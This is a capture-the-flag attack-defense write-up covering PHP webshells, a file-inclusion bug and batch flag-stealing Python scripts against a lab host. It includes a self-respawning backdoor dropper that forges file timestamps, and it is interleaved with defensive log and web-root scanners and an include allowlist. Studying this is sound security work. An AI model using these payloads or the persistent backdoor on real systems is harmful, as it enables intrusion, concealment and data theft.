【AWD】 yunnan_simple WriteUp

Challenge environment:

Target IP: 192.168.2.146

SSH ports: 2201-2210

Web ports: 8801-8810

Flag submission address: 192.168.2.146:8080

Flag submission API: 192.168.2.146:8080/flag_file.php?token=<team token>&flag=<captured flag>

Vulnerabilities flagged by D盾 (D-Shield):


Vulnerability 1: .a.php

Vulnerability details:

```php
<?php @eval($_REQUEST['c']);
?>
```


As you can see, this is a one-line webshell (一句话木马).

Exploitation:

List the directory: 192.168.2.146:8801/.a.php?c=system(ls);

cat the flag: 192.168.2.146:8801/.a.php?c=system("cat /flag");


Script to grab and submit flags in batch:

```python
# 192.168.2.146:8801/.a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/.a.php'

for i in range(1, 11):
    payload = {"c": 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params=payload)
    except requests.RequestException:
        continue
    else:
        print(res.text)
        flag_payload = {"token": "team1", "flag": res.text}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
```
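From the defending side, requests like the ones above leave a very recognisable trace in the web server's access log. The following Python is an added example (not part of the original writeup): it scans combined-format log lines for query parameters whose value carries a PHP call such as `system(` or `eval(`, and for requests to dot-prefixed PHP files like `.a.php`. The log lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined format) for this example, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2018:09:10:12 +0800] "GET /.a.php?c=system(%22cat%20/flag%22); HTTP/1.1" 200 33 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Dec/2018:09:10:13 +0800] "GET /a.php?c=system(ls); HTTP/1.1" 200 5120 "-" "python-requests/2.20"
10.0.0.7 - - [01/Dec/2018:09:11:02 +0800] "GET /index.php?c=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Dec/2018:09:12:40 +0800] "POST /.a.php HTTP/1.1" 200 12 "-" "python-requests/2.20"
"""

# The request line inside a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# PHP calls that never belong in a query-string value on a normal site.
DANGEROUS_CALL_RE = re.compile(
    r'\b(system|exec|shell_exec|passthru|eval|assert|file_put_contents)\s*\(', re.I)


def dangerous_params(target):
    """Return (param, decoded value) pairs whose value contains a dangerous PHP call."""
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already decoded once; decode again to catch double encoding
            decoded = unquote(value)
            if DANGEROUS_CALL_RE.search(decoded):
                hits.append((name, decoded))
    return hits


def is_hidden_php(path):
    """True for dot-prefixed PHP files such as /.a.php, which a legitimate app rarely serves."""
    name = path.rsplit("/", 1)[-1]
    return name.startswith(".") and name.endswith(".php")


def scan_log(text):
    """Return one finding per suspicious log line: {'line', 'path', 'reasons'}."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        path = urlsplit(target).path
        reasons = [f"dangerous call in param {name!r}: {value}"
                   for name, value in dangerous_params(target)]
        if is_hidden_php(path):
            reasons.append("hidden PHP file")
        if reasons:
            findings.append({"line": lineno, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['path']}: " + "; ".join(f["reasons"]))
```

The POST on the last sample line carries no query string at all (the shell's parameter travels in the body), which is why the hidden-file check matters: a webshell named `.a.php` is caught by the path alone, whatever the body contains.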


Vulnerability 2: a.php

Vulnerability details:

```php
<?php @eval($_REQUEST['c']);
var_dump($_SERVER);
?>
```


Exploitation:

Almost the same as the previous one, except that a.php also calls var_dump(), so when grabbing the flag you need a regex match (or simply slice the string).


Script to grab and submit flags in batch:

```python
# 192.168.2.146:8801/a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/a.php'

for i in range(1, 11):
    payload = {"c": 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params=payload)
    except requests.RequestException:
        continue
    else:
        flag = res.text[0:32]  # the flag comes first, before the var_dump() output
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
```

Vulnerability 3: about.php

Vulnerability details:

```php
<?php
    $file=$_GET['file'];
    include $file;
?>
```


Obviously a file inclusion vulnerability:


Script:

```python
# http://192.168.2.146:8801/about.php?file=/flag

import requests

url1 = "http://192.168.2.146:"
url2 = '/about.php'

for i in range(1, 11):
    payload = {"file": '/flag'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params=payload)
    except requests.RequestException:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
```
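What about.php is missing is any check on the `file` value before it reaches `include`. The following is an added example (not from the original writeup) of that check, written in Python so it can be run here rather than in PHP: the user-supplied value is first matched against an allowlist of bare page names, and the allowlisted name is then resolved with realpath and required to stay under the pages directory. The page names and directory layout are assumptions for the example; `/flag` is the input used in this writeup.

```python
import os
import tempfile

# Hypothetical allowlist of page names the application is willing to include.
ALLOWED_PAGES = {"about", "contact"}


def resolve_page(pages_dir, requested):
    """Turn the user-supplied 'file' value into a path that is safe to include.

    Layer 1: the value must be a bare page name from the allowlist, so absolute
    paths, traversal sequences and stream wrappers are never even looked at.
    Layer 2: the allowlisted name is still resolved with realpath and required
    to stay under pages_dir, so a stray symlink inside pages_dir cannot lead elsewhere.
    Raises ValueError on anything that must not be included.
    """
    if requested not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {requested!r}")
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, requested + ".html"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"resolved path escapes pages directory: {candidate}")
    if not os.path.isfile(candidate):
        raise ValueError(f"page file missing: {candidate}")
    return candidate


def demo():
    """Build a throwaway web root (constructed for the example) and show which values get through."""
    with tempfile.TemporaryDirectory() as root:
        root = os.path.realpath(root)
        pages = os.path.join(root, "pages")
        os.mkdir(pages)
        with open(os.path.join(pages, "about.html"), "w") as fh:
            fh.write("<h1>About</h1>")
        # 'contact' is allowlisted, but its file is a symlink leading outside pages/
        outside = os.path.join(root, "outside.txt")
        open(outside, "w").close()
        os.symlink(outside, os.path.join(pages, "contact.html"))

        results = {}
        for value in ("about", "contact", "/flag", "config.php"):
            try:
                results[value] = "allowed: " + os.path.relpath(resolve_page(pages, value), root)
            except ValueError as exc:
                results[value] = "rejected: " + str(exc).split(":")[0]
        return results


if __name__ == "__main__":
    for value, outcome in demo().items():
        print(f"file={value!r:<14} -> {outcome}")
```

The second layer looks redundant next to the allowlist, but it is the one that survives mistakes: if someone later widens the allowlist or drops a symlink into the pages directory, the realpath containment check still refuses to include anything outside it.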

Vulnerability 4: config.php


Another one-line webshell.

Script:

```python
# http://192.168.2.146:8801/config.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/config.php'

for i in range(1, 11):
    payload = {"c": 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params=payload)
    except requests.RequestException:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
```

Using the one-line webshell to upload an immortal shell (不死马) in batch

  • PHP version of the immortal shell:

    ```php
    <?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '2.php';
    $code = '<?php if(md5($_GET["pass"])=="1ac3544114c9c5e2853a183138093e5e"){@eval($_POST[coin]);} ?>';

    while (1) {
        file_put_contents($file, $code);
        system('touch -m -d "2018-12-01 09:10:12" .2.php');
        usleep(5000);
    }
    ?>
    ```

  • Uploading the immortal shell from HackBar (assuming c is the one-line webshell's password parameter):

    Here stripslashes() is the un-escaping function.

    ```php
    c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
    ```

  • Because the immortal shell is uploaded in batch from Python, the PHP above has to be escaped a second time:

    ```python
    file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
    ```
    
  • Final Python script:

    ```python
    import time
    import requests

    url1 = "http://192.168.2.146:"

    url2 = "/.a.php"   # .a.php holds the one-line webshell @eval($_REQUEST['c']);

    for i in range(1, 11):
        print("*****************************")
        url = url1 + str(8800 + i) + url2
        hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));"
        data = {
            "c": hack
        }
        try:
            upload_res = requests.post(url, data=data)
        except requests.RequestException:
            continue
        else:
            print("Immortal shell uploaded to the machine on port " + str(8800 + i))
            requests_url = url1 + str(8800 + i) + "/bsm.php"  # trigger the immortal shell
            try:
                requests_res = requests.get(requests_url, timeout=5)
            except requests.RequestException:
                # bsm.php loops forever, so this request always times out;
                # wait 6 seconds for it to write the immortal shell 2.php
                time.sleep(6)
                print("------- Fetching the flag through the immortal shell:")
                get_flag_url = url1 + str(8800 + i) + "/2.php?pass=7coin@1202"
                get_flag_data = {
                    "coin": "system(\"cat /flag\");"
                }
                get_flag_res = requests.post(get_flag_url, data=get_flag_data)
                print("Flag on port " + str(8800 + i) + ": " + get_flag_res.text[0:32])
                flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]}
                submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
                print("Flag submitted!")
    ```
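From the defending side, every shell in this writeup shares a few textual and filesystem traits: eval() on a request superglobal, ignore_user_abort(true) together with unlink(__FILE__), a dot-prefixed .php filename, and an mtime pushed back with touch -m -d. The Python scanner below is an added example (not part of the original writeup) that walks a web root and reports files showing those traits. It also compares ctime with mtime: touch -m -d rewrites mtime, but the kernel records that change by setting ctime to the current time, so a file whose mtime is far older than its ctime has been backdated. The files in the temporary web root are constructed for the example.

```python
import os
import re
import tempfile
import time

# Textual traits of the shells shown in this writeup.
PATTERNS = {
    "eval on request input": re.compile(r'\beval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b', re.I),
    "immortal-shell loop (ignore_user_abort)": re.compile(r'ignore_user_abort\s*\(\s*true\s*\)', re.I),
    "self-deleting dropper (unlink(__FILE__))": re.compile(r'unlink\s*\(\s*__FILE__\s*\)', re.I),
    "timestamp forgery (touch -m -d)": re.compile(r'\btouch\s+-[a-z]*m[a-z]*\s+-d\b', re.I),
}
FORGED_MTIME_GAP = 24 * 3600  # ctime this much newer than mtime is not how normal editing looks


def scan_file(path):
    """Return the list of reasons this file looks like one of the writeup's shells."""
    reasons = []
    try:
        with open(path, "r", errors="replace") as fh:
            content = fh.read()
    except OSError:
        return reasons
    for label, rx in PATTERNS.items():
        if rx.search(content):
            reasons.append(label)
    name = os.path.basename(path)
    if name.startswith(".") and name.endswith(".php"):
        reasons.append("hidden PHP file")
    st = os.stat(path)
    # touch -m -d rewrites mtime, but the kernel records that change by setting
    # ctime to *now*; an mtime far older than ctime therefore exposes the forgery.
    if st.st_ctime - st.st_mtime > FORGED_MTIME_GAP:
        reasons.append("mtime older than ctime by more than a day")
    return reasons


def scan_webroot(root):
    """Walk root and map each suspicious file (relative path) to its reasons."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = scan_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def demo():
    """Create a temporary web root with constructed files and scan it."""
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        ".a.php": "<?php @eval($_REQUEST['c']); ?>",
        "bsm.php": ("<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); "
                    "while (1) { file_put_contents($file, $code); "
                    "system('touch -m -d \"2018-12-01 09:10:12\" .2.php'); usleep(5000); } ?>"),
        "2.php": "<?php if(md5($_GET[\"pass\"])==\"<md5-of-password>\"){@eval($_POST[coin]);} ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, content in samples.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(content)
        # Backdate 2.php the way the writeup's touch command does.
        forged = time.mktime((2018, 12, 1, 9, 10, 12, 0, 0, -1))
        os.utime(os.path.join(root, "2.php"), (forged, forged))
        return scan_webroot(root)


if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(f"{path}: " + "; ".join(reasons))
```

Content matching alone misses a shell that has been re-encoded, which is why the filename and timestamp checks are kept separate: the ctime/mtime comparison in particular needs nothing from the file body and flags the rewritten 2.php even though its contents are a single innocuous-looking line.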
    

Other vulnerabilities:

